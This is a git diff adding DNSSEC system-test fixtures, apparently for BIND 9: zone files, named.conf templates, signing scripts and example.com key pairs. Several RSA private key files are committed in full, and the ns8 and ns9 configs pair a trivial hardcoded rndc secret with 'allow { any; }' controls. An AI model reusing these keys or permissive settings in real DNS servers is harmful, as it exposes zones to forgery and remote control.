new file mode 100644 index 0000000..b2aa393 --- /dev/null +++ b/bin/tests/system/dnssec/ns6/optout-tld.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +optout-tld. 60 IN SOA example. . 0 0 0 0 0 +optout-tld. 60 IN NS ns6.optout-tld. +ns6.optout-tld. 60 IN A 10.53.0.6 +a 60 PTR example. +b 60 PTR example. +a.b.c.d 60 NS example. +e 60 PTR example. +f 60 PTR example. +g 60 PTR example. +h 60 PTR example. diff --git a/bin/tests/system/dnssec/ns6/sign.sh b/bin/tests/system/dnssec/ns6/sign.sh new file mode 100644 index 0000000..abfb112 --- /dev/null +++ b/bin/tests/system/dnssec/ns6/sign.sh @@ -0,0 +1,29 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +echo_i "ns6/sign.sh" + +zone=optout-tld +infile=optout-tld.db.in +zonefile=optout-tld.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -A -o "$zone" "$zonefile" > /dev/null 2>&1 diff --git a/bin/tests/system/dnssec/ns7/named.conf.in b/bin/tests/system/dnssec/ns7/named.conf.in new file mode 100644 index 0000000..55cbec9 --- /dev/null +++ b/bin/tests/system/dnssec/ns7/named.conf.in @@ -0,0 +1,76 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; + minimal-responses yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "nsec3.example" { + type secondary; + primaries { 10.53.0.3; }; + file "nsec3.example.bk"; +}; + +zone "optout.example" { + type secondary; + primaries { 10.53.0.3; }; + file "optout.example.bk"; +}; + +zone "nsec3-unknown.example" { + type secondary; + primaries { 10.53.0.3; }; + file "nsec3-unknown.example.bk"; +}; + +zone "optout-unknown.example" { + type secondary; + primaries { 10.53.0.3; }; + file "optout-unknown.example.bk"; +}; + +zone "multiple.example" { + type secondary; + primaries { 10.53.0.3; }; + file "multiple.example.bk"; +}; + +zone "nosoa.secure.example" { + type primary; + file "nosoa.secure.example.db"; +}; + +zone "split-rrsig" { + type primary; + file "split-rrsig.db.signed"; + allow-update { any; }; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dnssec/ns7/named.nosoa b/bin/tests/system/dnssec/ns7/named.nosoa new file mode 100644 index 0000000..caefbbb --- /dev/null +++ b/bin/tests/system/dnssec/ns7/named.nosoa @@ -0,0 +1,12 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Add -T nosoa. diff --git a/bin/tests/system/dnssec/ns7/nosoa.secure.example.db b/bin/tests/system/dnssec/ns7/nosoa.secure.example.db new file mode 100644 index 0000000..d3c9878 --- /dev/null +++ b/bin/tests/system/dnssec/ns7/nosoa.secure.example.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2010062400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns +ns IN A 10.53.0.7 +a IN A 1.2.3.4 diff --git a/bin/tests/system/dnssec/ns7/sign.sh b/bin/tests/system/dnssec/ns7/sign.sh new file mode 100644 index 0000000..55c1988 --- /dev/null +++ b/bin/tests/system/dnssec/ns7/sign.sh @@ -0,0 +1,44 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +echo_i "ns7/sign.sh" + +zone=split-rrsig +infile=split-rrsig.db.in +zonefile=split-rrsig.db + +k1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +k2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$k1.key" "$k2.key" > "$zonefile" + +# The awk script below achieves two goals: +# +# - it puts one of the two RRSIG(SOA) records at the end of the zone file, so +# that these two records (forming a single RRset) are not placed immediately +# next to each other; the test then checks if RRSIG RRsets split this way are +# correctly added to resigning heaps, +# +# - it places a copy of one of the RRSIG(SOA) records somewhere else than at the +# zone apex; the test then checks whether such signatures are automatically +# removed from the zone after it is loaded. +"$SIGNER" -P -3 - -A -o "$zone" -O full -f "$zonefile.unsplit" -e now-3600 -s now-7200 "$zonefile" > /dev/null 2>&1 +awk 'BEGIN { r = ""; } + $4 == "RRSIG" && $5 == "SOA" && r == "" { r = $0; next; } + { print } + END { print r; print "not-at-zone-apex." r; }' "$zonefile.unsplit" > "$zonefile.signed" diff --git a/bin/tests/system/dnssec/ns7/split-rrsig.db.in b/bin/tests/system/dnssec/ns7/split-rrsig.db.in new file mode 100644 index 0000000..48c2f87 --- /dev/null +++ b/bin/tests/system/dnssec/ns7/split-rrsig.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +split-rrsig. 3660 IN SOA . . ( + 1 ; serial + 3600 ; refresh (1 hour) + 3600 ; retry (1 hour) + 3600 ; expire (1 hour) + 3600 ; minimum (1 hour) + ) + 3660 NS ns.example. +a.split-rrsig. 3660 IN A 192.0.2.2 +b.split-rrsig. 3660 IN A 192.0.2.2 diff --git a/bin/tests/system/dnssec/ns8/named.conf.in b/bin/tests/system/dnssec/ns8/named.conf.in new file mode 100644 index 0000000..ef3c913 --- /dev/null +++ b/bin/tests/system/dnssec/ns8/named.conf.in @@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS8 + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.8; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + minimal-responses no; + disable-algorithms "disabled.managed." { @DISABLED_ALGORITHM@; }; + disable-algorithms "disabled.trusted." { @DISABLED_ALGORITHM@; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "managed.conf"; +include "trusted.conf"; + diff --git a/bin/tests/system/dnssec/ns9/named.conf.in b/bin/tests/system/dnssec/ns9/named.conf.in new file mode 100644 index 0000000..d206d56 --- /dev/null +++ b/bin/tests/system/dnssec/ns9/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS9 + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.9; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + forward only; + forwarders { 10.53.0.4; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dnssec/ntadiff.pl b/bin/tests/system/dnssec/ntadiff.pl new file mode 100755 index 0000000..ca80eac --- /dev/null +++ b/bin/tests/system/dnssec/ntadiff.pl @@ -0,0 +1,24 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use Time::Piece; +use Time::Seconds; + +exit 1 if (scalar(@ARGV) != 2); + +my $actual = Time::Piece->strptime($ARGV[0], '%d-%b-%Y %H:%M:%S.000 %z'); +my $expected = Time::Piece->strptime($ARGV[1], '%s') + ONE_WEEK; +my $diff = abs($actual - $expected); + +print($diff . "\n"); diff --git a/bin/tests/system/dnssec/prereq.sh b/bin/tests/system/dnssec/prereq.sh new file mode 100644 index 0000000..90f5a55 --- /dev/null +++ b/bin/tests/system/dnssec/prereq.sh @@ -0,0 +1,45 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +if "$PERL" -e 'use Net::DNS;' 2>/dev/null +then + # shellcheck disable=SC2016 + if "$PERL" -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.70);' 2>/dev/null + then + : + else + echo_i "Net::DNS versions 0.69 to 0.70 have bugs that cause this test to fail: please update." >&2 + exit 1 + fi +fi + +exit 0 diff --git a/bin/tests/system/dnssec/setup.sh b/bin/tests/system/dnssec/setup.sh new file mode 100644 index 0000000..568c62b --- /dev/null +++ b/bin/tests/system/dnssec/setup.sh @@ -0,0 +1,52 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +copy_setports ns4/named1.conf.in ns4/named.conf +copy_setports ns5/named1.conf.in ns5/named.conf + +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns8/named.conf.in ns8/named.conf + +copy_setports ns9/named.conf.in ns9/named.conf + +( + cd ns1 + $SHELL sign.sh + { + echo "a.bogus.example. A 10.0.0.22" + echo "b.bogus.example. A 10.0.0.23" + echo "c.bogus.example. A 10.0.0.23" + } >>../ns3/bogus.example.db.signed +) + +( + cd ns3 + cp -f siginterval1.conf siginterval.conf +) + +( + cd ns5 + $SHELL sign.sh +) diff --git a/bin/tests/system/dnssec/signer/example.db.in b/bin/tests/system/dnssec/signer/example.db.in new file mode 100644 index 0000000..3ab6aa2 --- /dev/null +++ b/bin/tests/system/dnssec/signer/example.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +example. 60 IN SOA example. . 0 0 0 0 0 +example. 60 IN NS example. +example. 60 IN A 1.2.3.4 +; out of zone record +out-of-zone. 60 IN A 1.2.3.4 diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.key b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.key new file mode 100644 index 0000000..d4b8efb --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.key @@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 15002, for example.com. +; Created: 20210423012926 (Fri Apr 23 11:29:26 2021) +; Publish: 20210423012926 (Fri Apr 23 11:29:26 2021) +; Activate: 20210423012926 (Fri Apr 23 11:29:26 2021) +example.com. IN DNSKEY 257 3 8 AwEAAdp+oCXl7vpKA3Mmyndx6/iA+wLrtxeMUiWL7uWJ9ZF24EdS8Dye 63p0lGlyvjvM9T5dTiyEpTAdutEBr79H0MlDqIBqpadrCdJRI2S4kC+0 nq5+Aj2CEyiAamPGujwWeXwtfLAvVPfBqs42PBr6wPQIJOByFYDaZBU3 enUEWgHYy/7OnJDrt0QlswKphR6SvYtyuixiUR8J/WouWXglUY5qlC7Z vVDxs9E4q7B1mfKCyoqcFMKPh9lzEBH+IfUZ543xXEYf2BEztKB1SZ2R QnpYedjATGDcgPis46uA2gHMfvDYJTQ5UqTBtveGb3Wsqc0oRXVPMEoY 3WnWhaKDzkk= diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.private b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.private new file mode 100644 index 0000000..72b8e2e --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+15002.private @@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 8 (RSASHA256) +Modulus: 2n6gJeXu+koDcybKd3Hr+ID7Auu3F4xSJYvu5Yn1kXbgR1LwPJ7renSUaXK+O8z1Pl1OLISlMB260QGvv0fQyUOogGqlp2sJ0lEjZLiQL7Sern4CPYITKIBqY8a6PBZ5fC18sC9U98GqzjY8GvrA9Agk4HIVgNpkFTd6dQRaAdjL/s6ckOu3RCWzAqmFHpK9i3K6LGJRHwn9ai5ZeCVRjmqULtm9UPGz0TirsHWZ8oLKipwUwo+H2XMQEf4h9RnnjfFcRh/YETO0oHVJnZFCelh52MBMYNyA+Kzjq4DaAcx+8NglNDlSpMG294ZvdaypzShFdU8wShjdadaFooPOSQ== +PublicExponent: AQAB +PrivateExponent: SD4X64/0DTONonRP+2Biej8DP7r6RcHyo1F6QtDzrg4VJ+AHaLPO/iUvsRHsTk99QwqMv3F4QMmDrHmXR3KSWQmS3Crm7M0aaTzErBfOLMfWs7EcQoQQm5KiGq1phFaWAnXzxTlRKb4SIK6T/wOr6sQKlV+DNqB++Pjn92rh67vLM8kZBUzWI14Vl9N0ib+xOOFH1oYFo7ynDgMfJhpnQSkuRfyQls3aD1eKQsNazRtZ7lFi2S0HR/V0AKYH2AQi7SdL5wH6hYba5cHfpKSw7PebI0lYkUJ4PAg3Xw7DPMkg8O0hkpLICpU8x7MPqQQ74eKDaEY+fjbL0KLL0Dy9UQ== +Prime1: /IDRb7WzMY6wp14LqDORULoUnmiQOqkRjOQnCoEXT2KVpYwPmGMG+GR40hrMFgqqAZFVmi56VBoasWpYbSBEqM4aJv1JVimMPREk23v5i+TY93kxICO/ee9/v0hXgLmrKUkS1Kwu4a1PxLX5U/LAzXPR6zF+EHP9OKFjDRWHqN0= +Prime2: 3YU9QdtsXofjNmlDETRwemKv45pa0oVNPmNvS1vtzIpQ3m/QSuhJxzyTgSP9x1XMiIsg63er3LOCtkRifXVE1IBrfIUgchp8YD5LsyesRl2ielE8Hw8PwSA1YjUVu90yRHcVfbZJ8lm2KyRKHgDWXz94t2Xnm/9M5XjUGuNW7l0= +Exponent1: 7KIkpJYZyvW4ZAFk10sMgiUBMbs4f2D2i509YUC9ga4YJD7wVpVncN1nxS9L19RCopl7KbUo+yxDm8TX/dzhu3j7VVLFqbPiM1Cfw/mZUhszoii3ezFFPpbOl4rKRl66I0TSGvEKNoDfYrBPavby7Rf/wHRveifZRXspgpeMvRk= +Exponent2: yvvtjuxW2CRiopg/+YL40lyd2cy2DpRRnKqW8BHzzGquAbWpwwopmOS8MSjewgqv2irK5pmJJTpku0nciiOsB6EJXVfLzGLSt4o96ZOf+/aPDNBla/xsLkaqRCxqlvPwvOX2DnS8O9PS5qNhOy7/QNYzcrJxUfPV7awTh/Pr040= +Coefficient: PHxU1tqPKTpI/8nABvso0SRerc1m+RPWGRk7s/SVcADSBvEW7fUDcwiZeRfK9MdlwPvLiVozbYnRbgRQl8GuKSqAD1+Cnvn2yOQk81AgNKbuKPwF7UvKIdq/c/xnhj2bvZUVSavJ91ux/RlZNP50378Ks8bj5HJl1xzAMVHXB5o= +Created: 20210423012926 +Publish: 20210423012926 +Activate: 20210423012926 diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.key b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.key new file mode 100644 index 0000000..990b837 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.key @@ -0,0 +1,5 @@ +; This is a zone-signing key, keyid 63613, for example.com. +; Created: 20210423012810 (Fri Apr 23 11:28:10 2021) +; Publish: 20210423012810 (Fri Apr 23 11:28:10 2021) +; Activate: 20210423012810 (Fri Apr 23 11:28:10 2021) +example.com. IN DNSKEY 256 3 8 AwEAAZzun7bYfjmGDwUEn4pyJG34vsiawRMW6pEdoNMH87ozxriOzgG6 /4zTjEv8JyYjGQz2k2vcoWWcD+86xD5IUqfa1pdXXUU8bdhG9DBtW/K1 mc4P6g8heU+0f++mq/L4TPlWVZUG8lVH4H8mD6r8PsVK7v/QR7wMeg9b JpCYyxon2A9rZ4zS0J9kX9bfciQVh6ODGVENctwEK5FNp5u0VonPEIx3 5Kj+IVn/mHpfbz4LaC02s7C6Kgvn3ToFFSJczwbOaexl/d+/ai8FLJi7 8UgiAq5/178bcVLItMeY6aD5eQGkRtr2c3JZ/JR4Nf+TQAWFBnl9NSDa RH4Qa55ZNqs= diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.private b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.private new file mode 100644 index 0000000..1765d3f --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+008+63613.private @@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 8 (RSASHA256) +Modulus: nO6ftth+OYYPBQSfinIkbfi+yJrBExbqkR2g0wfzujPGuI7OAbr/jNOMS/wnJiMZDPaTa9yhZZwP7zrEPkhSp9rWl1ddRTxt2Eb0MG1b8rWZzg/qDyF5T7R/76ar8vhM+VZVlQbyVUfgfyYPqvw+xUru/9BHvAx6D1smkJjLGifYD2tnjNLQn2Rf1t9yJBWHo4MZUQ1y3AQrkU2nm7RWic8QjHfkqP4hWf+Yel9vPgtoLTazsLoqC+fdOgUVIlzPBs5p7GX9379qLwUsmLvxSCICrn/XvxtxUsi0x5jpoPl5AaRG2vZzcln8lHg1/5NABYUGeX01INpEfhBrnlk2qw== +PublicExponent: AQAB +PrivateExponent: N4egcDzO/V/YdLgcFAsrpNY9/BH2e+DCA7NuMv4/WgX0LV4quyYGQzigDksdNzt4I8Qkiig53BCK+uXahwdkaAzhng/F6zfkzoDc6z3nKUzlLasn8U6w9Gk0VAKwGXuPETNheShKG68hWxyGssQrGfjX9SEoIPxxPHnOfZ/zTj95KAnVV5qPz90xVAb0+FUrLXAt72KuRwepOTlsETsMFDKe17uUCqCCdX98Ko0u14wrO6zGRQtNhUsfvNB/pY8fvbHD1GcCTbFSx4FxsUsZMrNtMsvMe3HN9ggC0Y9htbH9HV0hS0w9SKCUyoeOVwf/JZL4hlfoe8+jglsyJpAgoQ== +Prime1: zeXvO3PT4iXv9GlGeebl39pF1sXs8tXY4B9VHUJGGSYlyOlyCEy4URQJIPfuL6VjFKCErSxUJSrGz0HyQuKr8l9qP/0MGxGRH7wxvUR7YTmai84yyQ4fFENRmn8bzxGwj0MVHIW7cKC59j7nWT24gseT21/NP5m8EnPsjz/K40M= +Prime2: wx5vVFSydUfr8HtOHNS1kRrTjhnQOfjmj8SxGi72Hk+mgi9fBCTC5fRLifd80wGbgyFk1vZOXeStOC8L3IlnBGLX0O9MNip+vVX3hRzIRhLwHhL1ygN3xEd04qwVH0XJ8+4A0XCzh/FJgW59F62geN6gwedo7GmZAOSZUBAyRHk= +Exponent1: IlkqeLuQ7Fgx2I87b5iiXp62Keco6TXdkT4I3/GvagCgKw0utc2+rd/uye4ycQZhKg7BM3aCrxScx/STaq8PykY6nmQjgdyDXkzx60YiYwzOCGakuD+/1YyJb4Gm7PthffTN780rgNV/UGIcDBoszrxmoSExR1vpMRbfruIQgas= +Exponent2: or0Os/KUibc79W6Snv9WlLkgPAQRpViQzNaLtD/47R0Xzrs975HNsMgJ/P+bb86Ga1994MC8ahmh1BuBNCax8nmScWQ1V3QoEzjRYoe4DqIa/aposF4mFWJX/fry/wtRPo+CxSzPwJGh8j86PHaHQmjFAhVFcPE+OP1xVdK8alk= +Coefficient: r5wPmPXUF5pVC0Y7La3jVkL4w/3wvq9LBz91tH9gA8OUNLpDDBuFZISiJdhOZ4JVw+qSSoHcEa+3Phd+BqxmXzwZDU1Fqta9mLDDGCqCWjVQOopeeJgrvkv9P0TIzEuoGmW50cQhyqHYCtuUxjOnHfiQSc53p7rfD4Vom1VQ3Ok= +Created: 20210423012810 +Publish: 20210423012810 +Activate: 20210423012810 diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.key b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.key new file mode 100644 index 0000000..47003a4 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.key @@ -0,0 +1,5 @@ +; This is a zone-signing key, keyid 18240, for example.com. +; Created: 20211221062121 (Tue Dec 21 17:21:21 2021) +; Publish: 20211221062121 (Tue Dec 21 17:21:21 2021) +; Activate: 20211221062121 (Tue Dec 21 17:21:21 2021) +example.com. IN DNSKEY 256 3 10 AwEAAe5GunnuJFyzmKiGUknSQY3aPtR5UR8vNLLyMCJswffRzoYwY14/ 60ZTsqzh7N+lJV3KAOraocFSsTnmWIM7D7DPpqtaJMQw90ypBG0cnUP1 wKX9L/gdOH/ITlluBiZpCv9Aux3FRECHBO4Gx8Rse8ST2Vag3UuOPW+q HkLsWQt22K/hYuDhEtUWWx2dTIaXUVXNSNbk2zPL+lhC9PaRV+//1Fjo UX4qXCUuUN4TiqlkK2v4UkcIyld1n2R7qTQAkoN9amGFtPu8z5Zw7CxC San03yUSNuKub3fGys11gQRFuEHRX7FxKxvJjmcngG9qCh8AyfHZ8zYb VstTy1unFoM= diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.private b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.private new file mode 100644 index 0000000..f16b627 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+18240.private @@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 10 (RSASHA512) +Modulus: 7ka6ee4kXLOYqIZSSdJBjdo+1HlRHy80svIwImzB99HOhjBjXj/rRlOyrOHs36UlXcoA6tqhwVKxOeZYgzsPsM+mq1okxDD3TKkEbRydQ/XApf0v+B04f8hOWW4GJmkK/0C7HcVEQIcE7gbHxGx7xJPZVqDdS449b6oeQuxZC3bYr+Fi4OES1RZbHZ1MhpdRVc1I1uTbM8v6WEL09pFX7//UWOhRfipcJS5Q3hOKqWQra/hSRwjKV3WfZHupNACSg31qYYW0+7zPlnDsLEJJqfTfJRI24q5vd8bKzXWBBEW4QdFfsXErG8mOZyeAb2oKHwDJ8dnzNhtWy1PLW6cWgw== +PublicExponent: AQAB +PrivateExponent: U/ipDv9V4TWJvxpXNZzbbVpUehym8g54y/d97yPU17kgxzmWS0jLaWVluneEOuzAVmUyHZIfHzo9KuJ6nwTZar5DRm/mNR3siR+nZ6yF38VjtxubJB1oI+A7fFjB4hdywLHXP46dlv/+RMQu8pIorAZOubDHTDE8hXW2ZG9WkisJ5P7KoaL4KFHHHXi5vsXAMph4Zphd/zPxVL2tHD3l5c3QXRpQWfTNZNQcZ1f/4yVCuMRibg5LCvpia0ZwRrlygfZdAHUUd0VJDfRO45J5nlIJSAHQtjYtVTL+xNISWOHXovVlInkVyluACqfX94I7qPXTu41yg3SxrrtHE6RTwQ== +Prime1: +/YsRxmUxgvHKUh4SxdjzqNDDEi8b2BtM5IpctjVG3oYsL6J9xJB3U5/lbrGEPgl/1ndBUSXMQ6zQ5WcDE1qBAdW8t0eyniyuiexcgQ9f04Ds7p7oUiSHGLRn8YqQOzmiASXoZmkzfJZ+42pGhT3RZ+aYKtWQGMHqXabwV3zZl0= +Prime2: 8hhnKzPzExy6wv/MV0aYKo1g4azrRjug6743/ctTC7zjnMmDW7RMFTXmq5Tu3pFaIL4N4C4m1b7P3abfTrjm+DwHnrlRIvLWS3zJnvUEM22i4BwqqTLRiJpoT5Bfp4pVsdOPT7Iyx1q5UsJZ7Q4qMpg2TFpGiQyieRB5Xwpu4l8= +Exponent1: ZFPx7Z3SD8pA0793pu75Xx7DY/DSl8bdtNtOhdyxfu9vRXGZnjg24diQFR76H2ewOa2exKo7Sd2ApDi+mmd4/4Gsrag+yoClKlsD3VKy6i42ayqmb+Jly8fNkMFnsdKjOSYa+s4jQZ5vFiuiWjBfBeo3nqabAahtNJ12B9lRQkE= +Exponent2: tNz4TnVsFo4zFLVHsrghvECM7WxjBMBNc3FToT6CV1WRcjO1+A/Ve08eenc0kYBjpex2r1GrX6pC3uPpFoXav/8Q7kqiTArBf/nFIwUHU2iH8wf38xntIjHA1hgU7jTR2p0kBrUpbHfh1esuhYQ8kDnY7ufOpFqVEv70vcUsm98= +Coefficient: 3acDCJ9jCnHAP1km7jRO388mOpiI8U6SMv0PBD8l2UoB4CYwujrFxy6PhgUa486bbm5xZEaOwhYZcbw/g1qyC6Qt5kYOb2fVWOob/lEQmyqbDvHMQWTJoIbqaDTKQN/szI4xVdb/xZ6QR4Bq7JgbJpUACgweS540Y7Lf8Dry8C0= +Created: 20211221062121 +Publish: 20211221062121 +Activate: 20211221062121 diff --git a/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.key b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.key new file mode 100644 index 0000000..37bd259 --- /dev/null +++ b/bin/tests/system/dnssec/signer/general/Kexample.com.+010+28633.key @@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 28633, for example.com. +; Created: 20211221062130 (Tue Dec 21 17:21:30 2021) +; Publish: 20211221062130 (Tue Dec 21 17:21:30 2021) +; Activate: 20211221062130 (Tue Dec 21 17:21:30 2021) +example.com. IN DNSKEY 257 3 10 AwEAAc4lt8fDsdCzMCLHxXm8Ok/dw6XDiqx06Rf47LTeLmo6b64xm1Fs 0zloNMrcZDgwS5IxjQ3Breqc5aEc+jehueqCXa/fJXMdIt1VpUG0H7GP 4B+1IVmEiziHfmOozktdkuAyLqcsNhsf+J1+bCoHJSffgz6KbjBks/jR 12uyUnZCDrKGE/KfiR0gpT3watqGqqChO0KXq2N2PsnYfyRDea5FMUjM 